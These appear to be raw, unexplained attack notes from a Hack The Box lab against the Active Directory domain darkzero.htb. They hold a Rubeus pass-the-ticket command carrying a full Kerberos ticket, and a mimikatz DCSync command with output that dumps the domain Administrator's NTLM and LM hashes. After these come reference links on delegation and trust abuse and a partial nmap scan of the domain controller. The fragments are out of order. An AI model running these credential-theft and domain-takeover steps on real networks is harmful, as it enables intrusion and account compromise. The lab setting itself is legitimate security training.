Rubeus.exe ptt /ticket:doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDbmgFnJ6Hle78LvQKgbcFyQdnc6wcGVA+lrF6aFF9Px0QCmlp9PXGL4h4BJLfto4dlCqAN/RY6Er9/O9Fl0XeECb0Sfg7hsZmxazs2s0J62+kw8QbK7yE+Fyrmc8/UxEBIEjrfc2Nlzoyvw69mgirjWP0dfI5/uFV8rOu0T75XfsOYC4Ycd5TBOsORLywEtQVYz0VpgGkOyJRelhUPFX8z93SApnKBPO+Wug+RIVy8Cnq4gfPp/c5rIs8pdsPnMEDSolBTZaJPuRPMBda/OAR0iYgz0WHaZA2fj0X0Hr0dzV3MC6NpS3T4ovlYoHlRf63aK7LwjDpFGwZgJwKOZ/VOb/A+M7xHq3/ijDAtVmGolimvaYe8kvXiN1Qr0fhRJyuCrGkX8xcmTJSteXWWKOiSI9+HbRpHpezPs2IHxGG/IxkwNuSvlrU64o4r/8W2+eB8mZWP5CJ6WbC05ZoKH4OR8Cht868/mwL6s89Z+a+4u2xaS434zxPI7SOW7z7U27glOFCbyUMJ4A/KuiCuwNZHmVQNRUZqQG1Q5IQXqgpUHSGYCaXMJW88GAQN6JfuXs/lZe/1PaXObrq88xbWUcdzZZimr6dsdTEmY/cIZoyjkgnBLNU172tcOODs0ddTXbptqCgEW1kBiEkqM46XiaPuChVwKYAKORRJ1/7e/qDWbLzceL2R0bDfWX9AP+aHckp+6sd51X9uO3oakDl4YBrYEnGWO7T9iAj882rY8OabPS7gGzFK1n+xfiHjJcTiWYf68siveDVyXISUJPT2sLxnX/kaq2jLOi49FpG9r/Uf8FZSflMOSwq4nz0t3qmTtjEpIsW7RZlLYNVMdvOpNspOojv0nZO6nrGc6p7O3KvwkmM9/H6MI2EkKWnHJVVEuNI8v3VH8t5Vou7Xd221yVAPTSUAlDahl3mZotKQ+ZVZ9KxhBrPxXllW23YBKpm6JO4UbLRQKkKzxfkQPV3Va7x3UB86GvCRqI5raSvmuOInH4wnXk9wxe6wn6wXRHQ1t1B6gKx5VnAqPBIsbw4gVUlAXM1jbCn7iDvEUw8JQpMcKpizVBlz+sYchTvG4fviIO+Q3pw6EBBbkFWvhUGTK6uKU1EEmi6gXIE2ufOTVdIuQOEjqhWGWFAdHFrMsSgsycR3cZVyQBabLRq3U1f8xA6rYjNF3qslclPR5a2Sps674ItyM5udT80vOxvGOdLtuUNs3S+oWR1/sOA1EQmYrbPM8+CCm6GTF/IXIunOmuYeZDmadN8oujyHgjg6lxENN+elMMRQ/fjBqEl6GcvuQE+3gQed1Balct0fPhCcNlQ43D0BMBxlb8uX8MMmQNKfPHo67qKrt+V8choN57EBWdAVLtwlsNO6ZMSjyabTEUQTmd/kdMlKJa+NOwXEYrwFRaDVzOjjQNrgazZWYUIXxgKFexyTy2N3No4HjMIHgoAMCAQCigdgEgdV9gdIwgc+ggcwwgckwgcagKzApoAMCARKhIgQgCEFEnBk3DTMrqaDvjNktfannDYH/tJvAqc2yNUrc1jShDhsMREFSS1pFUk8uSFRCohIwEKADAgEBoQkwBxsFREMwMSSjBwMFAGChAAClERgPMjAyNTExMTgwMDIwMDVaphEYDzIwMjUxMTE4MTAyMDA1WqcRGA8yMDI1MTEyNTAwMjAwNVqoDhsMREFSS1pFUk8uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5IVEI=
mimikatz.exe "lsadump::dcsync /domain:darkzero.htb /user:Administrator
mimikatz(commandline) # lsadump::dcsync /domain:darkzero.htb /user:Administrator
[DC] 'darkzero.htb' will be the domain
[DC] 'DC01.darkzero.htb' will be the DC server
[DC] 'Administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 9/10/2025 8:42:44 AM
Object Security ID : S-1-5-21-1152179935-589108180-1989892463-500
Object Relative ID : 500
Credentials:
Hash NTLM: 5917507bdf2ef2c2b0a869a1cba40726
ntlm- 0: 5917507bdf2ef2c2b0a869a1cba40726
ntlm- 1: 5917507bdf2ef2c2b0a869a1cba40726
lm - 0: 58ef66870a9927dd48b3bd9d7e03845f
Administrator:5917507bdf2ef2c2b0a869a1cba40726
https://bloodhound.specterops.io/resources/edges/abuse-tgt-delegation
https://blog.salucci.ch/docs/HackingLab/HackTheBox/SOC-Analyst/Coercing-Attacks/
https://specterops.io/blog/2025/06/25/good-fences-make-good-neighbors-new-ad-trusts-attack-paths-in-bloodhound/
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49692/tcp open msrpc Microsoft Windows RPC
49693/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49911/tcp open msrpc Microsoft Windows RPC
49942/tcp open msrpc Microsoft Windows RPC
49989/tcp open msrpc Microsoft Windows RPC
50001/tcp open msrpc Microsoft Windows RPC
52841/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR